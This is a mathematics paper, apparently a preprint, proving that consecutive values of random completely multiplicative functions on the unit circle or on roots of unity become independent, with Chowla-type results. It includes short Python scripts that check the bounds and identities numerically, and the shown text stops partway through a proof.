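Wintner's bound is easy to probe numerically. The following sketch (our own, with an arbitrary seed) draws i.i.d. signs at the primes via a smallest-prime-factor sieve, extends them completely multiplicatively, and checks that the partial sums stay far below $x$:

```python
import random

def random_completely_multiplicative(L, rng):
    """f[1..L] completely multiplicative, i.i.d. uniform +-1 at the primes."""
    spf = list(range(L + 1))              # smallest-prime-factor sieve
    for p in range(2, int(L ** 0.5) + 1):
        if spf[p] == p:
            for m in range(p * p, L + 1, p):
                if spf[m] == m:
                    spf[m] = p
    f, eps = [0] * (L + 1), {}
    f[1] = 1
    for m in range(2, L + 1):
        p = spf[m]
        if p not in eps:
            eps[p] = rng.choice([-1, 1])
        f[m] = eps[p] * f[m // p]
    return f

L = 10 ** 5
f = random_completely_multiplicative(L, random.Random(0))
assert all(f[a] * f[b] == f[a * b] for a in (2, 3, 7, 30) for b in (5, 9, 11))
# Partial sums grow much slower than x, consistent with o(x^r) for r > 1/2.
S, ratio = 0, 0.0
for x in range(1, L + 1):
    S += f[x]
    if x >= 1000:
        ratio = max(ratio, abs(S) / x ** 0.75)
assert ratio < 3.0
```

The exponent $0.75$ and the constant $3$ are loose illustrative margins for one random sample, not the sharp $x^{1/2+\epsilon}$ rate.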
In order to get more general results, it can be useful to consider complex-valued random multiplicative functions. For example, it has been proven by Bohr and Jessen \cite{BJ} that for $\sigma >1/2$,
the law of $\zeta(\sigma + iTU)$, for $U$ uniformly distributed on $[0,1]$, tends to a limiting random variable when $T$ goes to infinity.
This limiting random variable can be written as $\sum_{n \geq 1} X_n n^{-\sigma}$, when $(X_n)_{n \geq 1}$ is a random completely multiplicative function such that $(X_p)_{p \in \mathcal{P}}$ are i.i.d. uniform on the unit circle, $\mathcal{P}$ denoting, as in all the sequel of the present paper, the set of prime numbers. The fact that the series just above converges is a direct consequence (by partial summation) of the analog of the result of Wintner for the partial sums of $(X_n)_{n \geq 1}$: one can prove that $\sum_{n \leq x} X_n = o(x^r)$ for $r > 1/2$.
This discussion shows that it is often much less difficult to prove accurate results for random multiplicative function than for the arithmetic functions which are usually considered. In some informal sense, the arithmetic difficulties are diluted into the randomization, which is much simpler to deal with.
In the present paper, we study another example of results which are stronger and less difficult to prove in the random setting than in the deterministic one.
The example we detail in this article is motivated by the following question, initially posed in the deterministic setting: for $k \geq 1$, what can we say about the distribution of the $k$-uples
$(\mu(n+1), \dots, \mu(n+k))$, or $(\lambda(n+1), \dots, \lambda(n+k))$, where $\mu$ and $\lambda$ are the M\"obius and the Liouville functions,
$n$ varies from $1$ to $N$, $N$ tends to infinity? This question is only very partially solved. One knows (it is essentially a consequence of the prime number theorem), that for $k = 1$, the proportion of integers such that $\lambda$ is equal to $1$ or $-1$ tends to $1/2$. For the M\"obius function, the limiting proportions are $3/\pi^2$ for $1$ or $-1$ and $1 - (6/\pi^2)$ for $0$.
It has been proven by Hildebrand \cite{Hil} that for $k=3$, the eight possible values
of $(\lambda(n+1), \lambda(n+2), \lambda(n+3))$ appear infinitely often. This result has been recently improved by Matom\"aki, Radziwill and Tao \cite{MRT}, who prove that these eight values
appear with a positive lower density: in other words, for all $(\epsilon_1, \epsilon_2, \epsilon_3) \in \{-1,1\}^3$,
$$\underset{N \rightarrow \infty}{\lim \inf} \frac{1}{N} \sum_{n=1}^N
\mathds{1}_{\lambda(n+1) = \epsilon_1,
\lambda(n+2) = \epsilon_2,
\lambda(n+3) = \epsilon_3} > 0.$$
The similar result is proven for the nine possible values of $(\mu(n+1), \mu(n+2))$.
Such results remain open for the M\"obius function and $k \geq 3$, or the Liouville function and $k \geq 4$. A conjecture by Chowla \cite{Ch} states that for all $k \geq 1$, each possible pattern of $(\lambda(n+1), \dots, \lambda(n+k))$ appears with asymptotic density $2^{-k}$.
In the present paper, we prove results similar to this conjecture for random completely multiplicative functions $(X_n)_{n \geq 1}$. The random functions we will consider take i.i.d. values on the unit circle on prime numbers. Their distribution is then
entirely determined by the distribution of $X_2$. The two particular cases we will study in the largest part of the paper are the following: $X_2$ is uniform on the unit circle $\mathbb{U}$, and $X_2$ is uniform on the set $\mathbb{U}_q$ of $q$-th roots of unity, for $q \geq 2$. In this case, we will show the following results: for all $k \geq 1$, and for all $n \geq 1$ large enough depending on $k$, the variables $X_{n+1}, \dots, X_{n+k}$ are independent, and exactly i.i.d. uniform on the unit circle if $X_2$ is uniform. Moreover, the empirical distribution
$$\frac{1}{N} \sum_{n=1}^N \delta_{(X_{n+1}, \dots, X_{n+k})}$$
tends almost surely to the uniform distribution on $\mathbb{U}^k$ if $X_2$ is uniform on $\mathbb{U}$, and to the uniform distribution on $\mathbb{U}_q^k$ if $X_2$ is uniform on $\mathbb{U}_q$.
In particular, the analog of Chowla's conjecture holds almost surely in the case where $X_2$ is uniform on $\{-1,1\}$. We have also an estimate on the speed of convergence of the empirical measure: in the case of the uniform distribution
on $\mathbb{U}_q$, each of the
$q^k$ possible patterns for $(X_{n+1}, \dots, X_{n+k})$ almost surely occurs with a proportion $q^{-k} + O(N^{-t})$ for $n$ running between $1$ and $N$, for all $t < 1/2$. We have a similar result in the uniform case, if the test functions we consider are sufficiently smooth.
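As an illustration of the $q=2$, $k=2$ case of this statement, a small Monte Carlo sketch (our addition; the seed and tolerance are arbitrary) counts consecutive sign patterns of such a random completely multiplicative function:

```python
import random
from itertools import product

def random_completely_multiplicative(L, rng):
    """f[1..L] completely multiplicative, i.i.d. uniform +-1 at the primes."""
    spf = list(range(L + 1))              # smallest-prime-factor sieve
    for p in range(2, int(L ** 0.5) + 1):
        if spf[p] == p:
            for m in range(p * p, L + 1, p):
                if spf[m] == m:
                    spf[m] = p
    f, eps = [0] * (L + 1), {}
    f[1] = 1
    for m in range(2, L + 1):
        p = spf[m]
        if p not in eps:
            eps[p] = rng.choice([-1, 1])
        f[m] = eps[p] * f[m // p]
    return f

N, k = 200_000, 2
f = random_completely_multiplicative(N + k, random.Random(1))
counts = {pat: 0 for pat in product((-1, 1), repeat=k)}
for n in range(N):
    counts[tuple(f[n + 1 + j] for j in range(k))] += 1
# Each of the 2^k sign patterns occurs with frequency close to 2^{-k} = 1/4.
for c in counts.values():
    assert abs(c / N - 0.25) < 0.02
```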
It would be interesting to have similar results when the distribution of $X_2$ on the unit circle is not specified. For $k \geq 2$, we are unfortunately not able to show similar results, but we nevertheless can prove that the empirical distribution of $X_n$ almost surely converges to a limiting distribution for any distribution of $X_2$ on the unit circle. We specify this distribution, which is always uniform on $\mathbb{U}$ or uniform on $\mathbb{U}_q$ for some $q \geq 1$, and in the latter case, we give an estimate of the rate of convergence. This rate corresponds to a negative power of $\log N$, which is much slower than what we obtain when $X_2$ is uniform on $\mathbb{U}_q$.
The techniques we use in our proofs are elementary in general, mixing classical tools in probability theory and number theory. However, a part of our arguments need to use deep results on diophantine equations, in order to bound the number and the size of their solutions.
The sequel of the paper is organized as follows. In Sections \ref{uniform} and \ref{uniformq}, we study the law
of $(X_{n+1}, \dots, X_{n+k})$ for $n$ large depending on $k$, first in the case where $X_2$ is uniform on $\mathbb{U}$, then in the case where $X_2$ is uniform on $\mathbb{U}_q$. In Section \ref{uniform2}, we study the empirical measure of
$(X_{n+1}, \dots, X_{n+k})$ in the case of $X_2$ uniform on $\mathbb{U}$. In the proof of the convergence of this empirical measure, we need to estimate the second moment of sums of the form $\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j}$. The problem of estimating moments of order different from two for such sums is discussed in Section \ref{moments}.
Finally, we consider the case of a general distribution for $X_2$ in Section \ref{general}.
\section{Independence in the uniform case} \label{uniform}
In this section, we suppose that $(X_p)_{p \in
\mathcal{P}}$ are i.i.d. uniform random variables on the unit circle. For convenience, we will extend our multiplicative function to positive rational numbers by setting $X_{p/q} := X_p/X_q$: the result is independent
of the choice of $p$ and $q$, and we have $X_r X_s = X_{rs}$ for all rationals $r, s > 0$. Moreover,
$X_r$ is uniform on the unit circle for all positive rational $r \neq 1$.
In this section, we will show that for fixed $k \geq 1$,
$(X_{n+1},\dots, X_{n+k})$ are independent if $n$ is sufficiently large. The following result gives
a criterion for such independence:
\begin{lemma} \label{1.1}
For all $n, k \geq 1$, the variables $(X_{n+1},\dots, X_{n+k})$ are independent if and only if
$\log(n+1), \dots, \log(n+k)$ are linearly independent over $\mathbb{Q}$.
\end{lemma}
\begin{proof}
Since the variables $(X_{n+1}, \dots, X_{n+k})$ are uniform on the unit circle, they are independent if and only
if
$$\mathbb{E}[X_{n+1}^{m_1} \dots X_{n+k}^{m_k}] = 0$$
for all $(m_1, \dots, m_k) \in \mathbb{Z}^k \backslash \{(0,0, \dots, 0)\}$.
This equality is equivalent to
$$ \mathbb{E}[X_{(n+1)^{m_1} \dots (n+k)^{m_k}}] = 0,$$
i.e. to $$(n+1)^{m_1} \dots (n+k)^{m_k} \neq 1,$$
or equivalently
\begin{equation} m_1 \log (n+1) + \dots + m_k \log (n+k) \neq 0. \label{1}
\end{equation}
\end{proof}
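The criterion of Lemma \ref{1.1} is easy to test by computer: since the logarithms of the primes are linearly independent over $\mathbb{Q}$, the $\mathbb{Q}$-linear independence of $\log(n+1), \dots, \log(n+k)$ is equivalent to the $\mathbb{Q}$-linear independence of the vectors of $p$-adic valuations of $n+1, \dots, n+k$, which reduces to an exact rank computation. Here is an illustrative sketch in Python (not part of the proof):

```python
from fractions import Fraction

def valuations(n):
    """Prime factorization of n as a dict {p: v_p(n)}."""
    v, p = {}, 2
    while p * p <= n:
        while n % p == 0:
            v[p] = v.get(p, 0) + 1
            n //= p
        p += 1
    if n > 1:
        v[n] = v.get(n, 0) + 1
    return v

def rank_over_Q(rows):
    """Rank of an integer matrix, by exact Gaussian elimination."""
    m = [[Fraction(x) for x in row] for row in rows]
    rank, col, ncols = 0, 0, len(rows[0])
    while rank < len(m) and col < ncols:
        piv = next((r for r in range(rank, len(m)) if m[r][col]), None)
        if piv is None:
            col += 1
            continue
        m[rank], m[piv] = m[piv], m[rank]
        for r in range(len(m)):
            if r != rank and m[r][col]:
                f = m[r][col] / m[rank][col]
                m[r] = [a - f * b for a, b in zip(m[r], m[rank])]
        rank, col = rank + 1, col + 1
    return rank

def independent(n, k):
    """True iff log(n+1), ..., log(n+k) are linearly independent over Q."""
    facs = [valuations(n + j) for j in range(1, k + 1)]
    primes = sorted(set().union(*facs))
    rows = [[f.get(p, 0) for p in primes] for f in facs]
    return rank_over_Q(rows) == k

# n = 7, k = 5 is dependent, because 8^4 * 9^3 * 12^(-6) = 1
print(independent(7, 5))   # False
print(independent(8, 5))   # True
```

For $n = 7$, $k = 5$, the dependence detected by the rank defect is for instance $8^4 \cdot 9^3 \cdot 12^{-6} = 1$.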
We then get the following result:
\begin{proposition} \label{1.2}
The variables $(X_{n+1}, \dots, X_{n+k})$ are i.i.d. as soon as $n \geq (100k)^{k+1} $. In particular, for $k$ fixed, this property
is true for all but finitely many $n$.
\end{proposition}
\begin{remark}
The same result is proven in \cite{T}, Theorem 3 (i),
with an asymptotically better bound, namely $n \geq e^{ck \log \log (k+2)/ \log (k+1)}$ where $c >0$ is a constant.
However, their proof uses a deep result by Shorey \cite{Sh} on linear forms in the logarithms of algebraic numbers, involving technical tools by Gelfond and Baker, whereas our proof is elementary. Moreover, the constant $c$ involved in \cite{T} is not given, even though it is in principle explicitly computable.
\end{remark}
\begin{proof}
Let us assume that \eqref{1} fails, i.e. that there is a linear dependence between $\log (n+1), \dots, \log(n+k)$: necessarily $k \geq 2$.
Moreover, the integers $n+j$ for which $m_j \neq 0$ cannot be divisible by a prime $p$ larger than $k$: otherwise,
this prime factor would remain in the product
$\prod_{\ell=1}^k (n+\ell)^{m_\ell}$, since none of the $n+\ell$ for $\ell \neq j$ can be divisible by $p$, and then the product could not be equal to $1$.
We can rewrite the dependence as follows:
$$\log(n+j) = \sum_{\ell \in A} r_{\ell} \log (n+\ell),$$
for a subset $A$ of $\{1, \dots, k\} \backslash \{j\}$ and for $R := (r_{\ell})_{\ell \in A} \in \mathbb{Q}^A$. Let us assume that the cardinality $|A|$ is as small as possible. Taking the decomposition into prime factors, we get, for all
$p \in \mathcal{P}$,
$$v_p(n+j) = \sum_{\ell \in A} v_p(n+\ell) r_{\ell}.$$
If $M := (v_p(n+\ell))_{p \in \mathcal{P}, \ell \in A}$, $V := (v_p(n+j))_{p \in \mathcal{P}}$, then we can write
these equalities in matrix form as $V = M R$. The minimality of $|A|$ ensures that the matrix $M$ has rank $|A|$.
Moreover, since all the prime factors of the integers
$n+\ell$, $\ell \in A \cup \{j\}$, are at most $k$,
all the rows of $M$ indexed by prime numbers larger than $k$ are identically zero, and then the rank $|A|$ of $M$ is at most
$\pi(k)$, the number of primes smaller than or equal to $k$.
Moreover, we can extract a subset $\mathcal{Q}$ of $\mathcal{P}$ of cardinality $|A|$ such that the restriction
$M^{(\mathcal{Q})}$ of $M$ to the rows with indices in $\mathcal{Q}$ is invertible.
We have with obvious notation: $V^{(\mathcal{Q})} = M^{(\mathcal{Q})} R$, and then by Cramer's rule,
the entries of $R$ can be written as the quotients of determinants of matrices obtained from $M^{(\mathcal{Q})}$
by replacing one column by $V^{(\mathcal{Q})}$, by the determinant of $M^{(\mathcal{Q})}$.
All the entries involved in these matrices are $p$-adic valuations of integers smaller than or equal to $n+k$, so
they are at most $\log (n+k)/ \log 2$. By the Hadamard inequality, the absolute values of the
determinants are smaller than or equal to
$([\log (n+k)/\log(2)]^{|A|}) |A|^{|A|/2}$. Since $|A| \leq \pi(k)$, we deduce, after multiplying by $\det
(M^{(\mathcal{Q})})$,
that there exists a linear dependence between $\log (n+1), \dots, \log (n+k)$ involving only
integers of absolute value at most $D := [\sqrt{\pi(k)} \log (n+k)/\log2]^{\pi(k)}$:
let us keep the notation of \eqref{1} for this dependence.
Let $q$ be the smallest nonnegative integer such that $\sum_{j=1}^k j^q m_j \neq 0$: from the fact that the
Vandermonde matrices are invertible, one deduces that $q \leq k-1$. Using the fact that
$$\left| \log(n+j) - \left( \log n + \sum_{r = 1}^{q} (-1)^{r-1} \frac{j^r}{r n^r} \right) \right|
\leq \frac{j^{q+1}}{(q+1) n^{q+1}},$$
we deduce, by inserting this expansion into the dependence above:
$$ \left| \sum_{j=1}^k j^q m_j \right| \frac{1}{q n^q} \leq \sum_{j=1}^k \frac{|m_j| j^{q+1}}{(q+1) n^{q+1}}$$
if $q \geq 1$ and
$$ \left| \sum_{j=1}^k m_j \right| \log n \leq \sum_{j=1}^k \frac{|m_j| j}{n}$$
if $q = 0$.
Since the first factor in the left-hand side of these inequalities is a non-zero integer, it is at least $1$.
From the bounds we have on the $m_j$'s, we deduce
$$ \frac{1}{q n^q} \leq \frac{ D k^{q+2}}{(q+1) n^{q+1}}$$
for $q \geq 1$ and
$$ \log n \leq \frac{ D k^2}{n}$$
for $q = 0$. Hence
$$1 \leq \left(\frac{q}{q+1} \vee \frac{1}{\log n} \right) \frac{ D k^{q+2}}{n} \leq \frac{ D k^{q+2}}{n}$$
if $n \geq 3$, which implies, since $q \leq k-1$,
$$n \leq D k^{k+1} \leq [\sqrt{\pi(k)} \log (n+k)/\log2]^{\pi(k)} k^{k+1}.$$
If $n \geq k \vee 3$, we deduce
$$ 2 n \leq 2 [\sqrt{\pi(k)} \log (2n)/\log2]^{\pi(k)} k^{k+1},$$
i.e.
$$ \frac{2n}{[\log (2n)]^{\pi(k)}} \leq 2 [\sqrt{\pi(k)}/\log2]^{\pi(k)} k^{k+1}
.$$
Now, one has obviously $\pi(k) \leq 2k/3$ for all $k \geq 2$, and then
$\sqrt{\pi(k)}/\log 2 \leq \sqrt{2 k}$ for all integers $k \geq 2$, and more accurately, it is known that
$(\pi(k) \log k )/k$, which tends to $1$ at infinity by the prime number theorem, reaches its maximum at $k = 113$.
Hence,
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\leq 2 (2 k)^{c k /\log k} k^{k+1}$$
where
$$c = \frac{1}{2} \, \frac{\pi(113) \log 113}{113} \leq 0.63$$
and then
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\leq 2 ( 2^{0.63 k/ \log 2}) k^{0.63 k/\log k} k^{k+1} \leq 2 e^{1.26 k} k^{k+1}
\leq (e^{1.26} k)^{k+1} \leq (3.6 k)^{k+1}.$$
Let us assume that $2n \geq (100k)^{k+1}$. The function
$x \mapsto x/\log^{\pi(k)}(x)$ is increasing
for $x \geq e^{\pi(k)}$. Moreover, by
studying the function $x \mapsto
\log \log (100 x) / \log (x+1)$ for $x \geq 2$, we check that $\log (100k) \leq (k+1)^{1.52}$ for all $k \geq 2$. Hence, since $\pi(k) \leq \pi(k+1)$,
$$\frac{2n}{[\log (2n)]^{\pi(k)}}
\geq \frac{(100k)^{k+1}}{
((k+1)\log (100k))^{\pi(k)}}
\geq \frac{(100k)^{k+1}}{(k+1)^{2.52 \pi(k+1)}}
$$ $$\geq \frac{(100k)^{k+1}}{(k+1)^{(2.52)(1.26) (k+1)/\log(k+1)}}
\geq (100 k e^{-3.18})^{k+1} \geq (4 k)^{k+1},$$
which contradicts the previous inequality.
Hence,
$$n \leq 2n \leq (100k)^{k+1},$$
and this bound is of course also valid for $n \leq k \vee 3$.
\end{proof}
This result implies that theoretically, for fixed $k$, one can find all the values of $n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent by brute force computation. In practice, the bound we have obtained is far from optimal, and is too poor to be directly usable except for very small values of $k$, for which more careful reasoning can solve the problem directly. Here is an example for $k=5$:
\begin{proposition}
For $n \geq 1$, the variables $(X_{n+1},X_{n+2}, X_{n+3}, X_{n+4}, X_{n+5})$ are independent except if $n \in \{1,2,3,4,5,7\}$.
\end{proposition}
\begin{proof}
If $\prod_{j=1}^5 (n+j)^{m_j} = 1$ with integers $m_1, \dots m_5$ not all equal to zero,
then $m_j = 0$ as soon as $n+j$ has a prime factor larger than or equal to $5$: otherwise, this prime factor cannot be cancelled by the factors $(n+\ell)^{m_\ell}$ for $\ell \neq j$. Hence, the values of $n+j$ such that $m_j \neq 0$ have only prime factors $2$ and $3$, and at most one of them has both factors since it should then be divisible by $6$. Moreover, if $n \geq 4$, there can be at most one power of $2$ and one power of $3$ among $n+1, \dots, n+5$.
One deduces that a dependence is only possible if, among $n+1, \dots, n+5$, there are three numbers, respectively of the form
$2^a, 3^b, 2^c.3^d$, for integers $a, b, c, d > 0$. The quotient between two of these integers is between $1/2$ and $2$, since we assume here that $n \geq 4$. Hence, $2^a \geq 2^c.3^d /2 \geq
2^c$ and then $a \geq c$. Similarly,
$3^{b} \geq 2^c.3^d /2 \geq 3^d$, which implies $b \geq d$. The numbers $2^a$ and $2^c.3^d$ are then both divisible by
$2^c$; since they differ by at most $4$,
$c \leq 2$. The numbers $3^{b}$ and
$2^c.3^d$ are both divisible by $3^d$, and then $d \leq 1$. Therefore,
$2^c.3^d \leq 12$ and $n \leq 11$.
By checking case by case the values of $n$ smaller than or equal to $11$, we get the desired result.
\end{proof}
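The exceptional set $\{1,2,3,4,5,7\}$ can also be recovered by an exhaustive scan based on the rank criterion of Lemma \ref{1.1}; a possible sketch (the finite search range is justified a posteriori by the proposition itself):

```python
from fractions import Fraction

def valuations(n):
    """Prime factorization of n as a dict {p: v_p(n)}."""
    v, p = {}, 2
    while p * p <= n:
        while n % p == 0:
            v[p] = v.get(p, 0) + 1
            n //= p
        p += 1
    if n > 1:
        v[n] = v.get(n, 0) + 1
    return v

def dependent(n, k):
    """True iff (n+1)^{m_1} ... (n+k)^{m_k} = 1 for some non-trivial
    integer exponents, i.e. iff the valuation vectors have rank < k."""
    facs = [valuations(n + j) for j in range(1, k + 1)]
    primes = sorted(set().union(*facs))
    m = [[Fraction(f.get(p, 0)) for p in primes] for f in facs]
    rank, col = 0, 0
    while rank < len(m) and col < len(primes):
        piv = next((r for r in range(rank, len(m)) if m[r][col]), None)
        if piv is None:
            col += 1
            continue
        m[rank], m[piv] = m[piv], m[rank]
        for r in range(len(m)):
            if r != rank and m[r][col]:
                f = m[r][col] / m[rank][col]
                m[r] = [a - f * b for a, b in zip(m[r], m[rank])]
        rank, col = rank + 1, col + 1
    return rank < k

print([n for n in range(1, 501) if dependent(n, 5)])  # [1, 2, 3, 4, 5, 7]
```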
The results above give an upper bound, for fixed $k$, of the maximal value of
$n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent. By considering two consecutive squares and their geometric mean, whose logarithms are linearly dependent, one deduces the lower bound
$ ([k/2]-1)^2 - 1 \geq (k-1)(k-5)/4$ for the maximal $n$.
As written in a note by Dubickas \cite{D}, this bound can be improved to a quantity equivalent to $(k/4)^3$,
by considering the identity:
$$(n^3 - 3n - 2)(n^3 - 3n +2) n^3
= (n^3 - 4n)(n^3 - n)^2.$$
In \cite{D}, as an improvement of a result of \cite{T}, it is also shown that for all $\epsilon > 0$, the lower bound
$e^{\log^2 k /[(4 + \epsilon) \log \log k]}$ holds for infinitely many values of $k$.
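The polynomial identity above can be checked directly; for instance, the following quick numerical sanity check (not needed for the argument) verifies it for many values of $n$:

```python
# Check (n^3 - 3n - 2)(n^3 - 3n + 2) n^3 == (n^3 - 4n)(n^3 - n)^2
# for many values of n; both sides expand to n^3 (n^6 - 6n^4 + 9n^2 - 4).
for n in range(2, 1000):
    c = n ** 3
    assert (c - 3 * n - 2) * (c - 3 * n + 2) * c == (c - 4 * n) * (c - n) ** 2
print("identity holds")
```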
A computer search
gives, for $k$ between $3$ and $13$, and
$n \leq 1000$, the following largest values for which we do not have independent variables: 1, 5, 7, 14, 23, 24, 47, 71, 71, 71, 239. For example, if $k = 13$ and $n = 239$, the five integers $240, 243, 245, 250, 252$ have only the four prime factors $2, 3, 5, 7$, so we necessarily have a dependence, namely:
$$240^{65} \cdot 243^{31} \cdot
245^{55} \cdot 250^{-40} \cdot
252^{-110} = 1.$$
It would remain to check if there are dependences for $n > 1000$.
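The dependence displayed above for $k = 13$, $n = 239$ can be verified with exact rational arithmetic; a small verification script (illustrative only):

```python
from fractions import Fraction

rel = {240: 65, 243: 31, 245: 55, 250: -40, 252: -110}

# The five integers involved have no prime factor other than 2, 3, 5, 7.
for base in rel:
    m = base
    for p in (2, 3, 5, 7):
        while m % p == 0:
            m //= p
    assert m == 1

# The product 240^65 * 243^31 * 245^55 * 250^(-40) * 252^(-110) equals 1.
prod = Fraction(1)
for base, exp in rel.items():
    prod *= Fraction(base) ** exp
print(prod)  # 1
```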
\section{Independence in the case of roots of unity} \label{uniformq}
We now suppose that
$(X_p)_{p \in \mathcal{P}}$ are i.i.d., uniform on the set of $q$-th roots of unity, $q \geq 1$ being a fixed integer. If $q = 2$, we get symmetric Bernoulli random variables.
For all integers $s \geq 2$, we will denote
by $\mu_{s,q}$ the largest divisor $d$ of
$q$ such that $s$ is a $d$-th power.
The analog of
Lemma \ref{1.1} in the present setting is the following:
\begin{lemma}
For $n, k \geq 1$, the variables
$(X_{n+1}, \dots, X_{n+k})$ are all
uniform on the set of $q$-th roots of unity if and only if $\mu_{n+j,q} = 1$ for all $j$ between $1$ and $k$. They are
independent if and only if
the only $k$-tuple $(m_1, \dots, m_k)$,
$0 \leq m_j < q/ \mu_{n+j,q}$, such that
$$\forall p \in \mathcal{P}, \sum_{j=1}^k m_j v_p (n+j)
\equiv 0 \pmod q$$
is $(0,0,\dots,0)$.
\end{lemma}
\begin{proof}
For any $s \geq 2$, $\ell \in \mathbb{Z}$, we have
$$\mathbb{E}[X_s^\ell] =
\prod_{p \in \mathcal{P}} \mathbb{E} [X_p^
{\ell v_p(s)}],$$
which is equal to $1$ if
$\ell v_p(s)$ is divisible by $q$ for all $p \in \mathcal{P}$, and to $0$ otherwise.
The condition giving $1$ is equivalent
to the fact that $\ell$ is a multiple
of $ q/\operatorname{gcd}(q, (v_p(s))_{p \in \mathcal{P}})$, which is $q/\mu_{s,q}$.
Hence, $X_s$ is a uniform $(q/\mu_{s,q})$-th root of unity, which implies the first part of the lemma.
The variables $(X_{n+1}, \dots, X_{n+k})$ are independent if and only if for all $m_1, \dots, m_k \in \mathbb{Z}$,
$$ \mathbb{E} \left[ \prod_{j=1}^k
X_{n+j}^{m_j} \right]
= \prod_{j=1}^k \mathbb{E}[ X_{n+j}^{m_j} ].$$
Since $X_{n+j}$ is a uniform $(q/\mu_{n+j,q})$-th root of unity, both sides of the equality depend only on the values of $m_j$ modulo $q/\mu_{n+j,q}$ for $1 \leq j \leq k$. This implies that we can assume, without loss of generality, that $0 \leq m_j < q/\mu_{n+j,q}$ for all $j$. If all the $m_j$'s are zero, both sides are obviously equal to $1$. Otherwise, the right-hand side is equal to zero, and then we have independence if and only if it is also the case of the left-hand side, i.e. for all
$(m_1, \dots, m_k) \neq (0,0, \dots, 0)$,
$0 \leq m_j < q/\mu_{n+j,q}$,
$$\mathbb{E} \left[ \prod_{j=1}^k
X_{n+j}^{m_j} \right]
= \mathbb{E} \left[ \prod_{p \in \mathcal{P}} X_p^{\sum_{1 \leq j \leq k}
m_j v_p(n+j)} \right]
= \prod_{p \in \mathcal{P}}
\mathbb{E} \left[ X_p^{\sum_{1 \leq j \leq k}
m_j v_p(n+j)} \right] = 0,$$
which is true if and only if
$$\exists p \in \mathcal{P}, \sum_{j=1}^k m_j v_p (n+j)
\not\equiv 0 \pmod q.$$
\end{proof}
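As the proof shows, $\mu_{s,q} = \operatorname{gcd}(q, \operatorname{gcd}_{p \in \mathcal{P}} v_p(s))$, since $s$ is a $d$-th power exactly when $d$ divides every $p$-adic valuation of $s$. A small sketch cross-checking this formula against the definition (illustrative only):

```python
from math import gcd

def valuations(n):
    """List of the p-adic valuations v_p(n) over the primes dividing n."""
    v, p = [], 2
    while p * p <= n:
        e = 0
        while n % p == 0:
            e += 1
            n //= p
        if e:
            v.append(e)
        p += 1
    if n > 1:
        v.append(1)
    return v

def mu(s, q):
    """mu_{s,q}: the largest divisor d of q such that s is a d-th power,
    computed as gcd(q, gcd of the valuations of s)."""
    g = 0
    for e in valuations(s):
        g = gcd(g, e)
    return gcd(q, g)

def is_dth_power(s, d):
    r = round(s ** (1.0 / d))
    return any((r + t) ** d == s for t in (-1, 0, 1))

# Cross-check the gcd formula against the definition for small s, q.
for s in range(2, 200):
    for q in range(1, 13):
        best = max(d for d in range(1, q + 1)
                   if q % d == 0 and is_dth_power(s, d))
        assert mu(s, q) == best
print("ok")
```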
We then have the following result, similar to Proposition \ref{1.2}:
\begin{proposition}
For fixed $k, q \geq 1$, there exists an explicitly computable $n_0(k,q)$ such that $(X_{n+1}, \dots, X_{n+k})$ are independent as soon as $n \geq n_0(k,q)$.
\end{proposition}
The bound $n_0(k,q)$ can be deduced from bounds on the solutions of certain diophantine equations which are available in the literature: we do not keep track of its precise value, which is anyway far too large to be of any use if we want to find in practice the values of $n$ such that $(X_{n+1}, \dots, X_{n+k})$ are not independent.
\begin{proof}
For each value of $n \geq 1$ such that
$(X_{n+1}, \dots, X_{n+k})$ are dependent,
there exist $0 \leq m_j < q/\mu_{n+j,q}$, not all zero, such that
$$\forall p \in \mathcal{P}, \sum_{j=1}^k m_j v_p (n+j)
\equiv 0 \pmod q.$$
There are finitely many choices, depending only on $k$ and $q$, for
the $k$-tuples $(\mu_{n+j,q})_{1 \leq j \leq k}$ and
$(m_j)_{1 \leq j \leq k}$, so it is sufficient to show that the values of $n$ corresponding to each
choice of $k$-tuples are bounded by an explicitly computable quantity.
At least two of the $m_j$'s are non-zero: otherwise $m_j v_p(n+j)$ is divisible by
$q$ for all $p \in \mathcal{P}$, $j$ being the unique index such that $m_j \neq 0$, and then $m_j$ is divisible by $q/\mu_{n+j,q}$: this contradicts the inequality
$0 < m_j < q/\mu_{n+j,q}$.
On the other hand, if $p$ is a prime larger than $k$, at most one of the terms
$m_j v_p(n+j)$ is non-zero, and then
all the terms are divisible by $q$, since
it is the case for their sum.
We deduce that $n+j$ is the product of a power of order $\rho_j := q/\operatorname{gcd}(m_j,q)$
and a number $A_j$ whose prime factors are all
smaller than or equal to $k$. Moreover, one can assume
that $A_j$ is ``$\rho_j$-th power free'', i.e. that all its $p$-adic valuations
are strictly smaller than $\rho_j$.
Hence there exist
$$A_j \leq \prod_{p \in \mathcal{P},
p \leq k} p^{\rho_j - 1} \leq (k!)^q$$
and an integer $B_j \geq 1$ such that
$n+j = A_j B_j^{\rho_j}$.
The values of the exponents $\rho_j$ are
fixed by the $m_j$'s, and at least two
of them are strictly larger than $1$, since at least two of the $m_j$'s are non-zero. Let us first assume that there exist distinct $j$ and $j'$ such that $\rho_j \geq 2$ and $\rho_{j'} \geq 3$.
One finds an explicitly computable bound on $n$ in this case as soon as we find an explicitly computable bound for the solutions of each diophantine equation in $x$ and $z$:
$$A z^{\rho_j} - A' x^{\rho_{j'}} = d$$
for each $A, A', d$ such that $1 \leq A, A' \leq (k!)^q$ and $-k < d < k$, $d \neq 0$.
These equations can be rewritten as: $y^{\rho_j} = f(x)$, where $y = Az$ and
$$f(x) = A^{\rho_j - 1} (A'x^{\rho_{j'}} + d).$$
This polynomial has only simple roots (the
$\rho_{j'}$-th roots of $-d/A'$), and then
at least two of them; it has at least three if $\rho_j = 2$, since $\rho_{j'}$ is assumed to be at least $3$ in this case.
By a result of Baker \cite{B}, all the solutions are bounded by an explicitly computable quantity, which gives the desired result (the same result with an ineffective bound was already proven by Siegel).
It remains to deal with the case where $\rho_j = 2$ for all $j$ such that $m_j \neq 0$. In this case, $q$ is even and $m_j$ is divisible by $q/2$, which implies that $m_j = q/2$ when $m_j \neq 0$. By looking at the prime factors larger than $k$, one deduces that for all $j$ such that $m_j \neq 0$,
$n+j$ is a square times a product of distinct primes smaller than or equal to $k$. If at least three of the $m_j$'s are non-zero, it then suffices to find an explicitly computable bound for the solutions of each system of diophantine equations:
$$ B y^2 = A t^2 + d_1, C z^2 = A t^2 + d_2$$
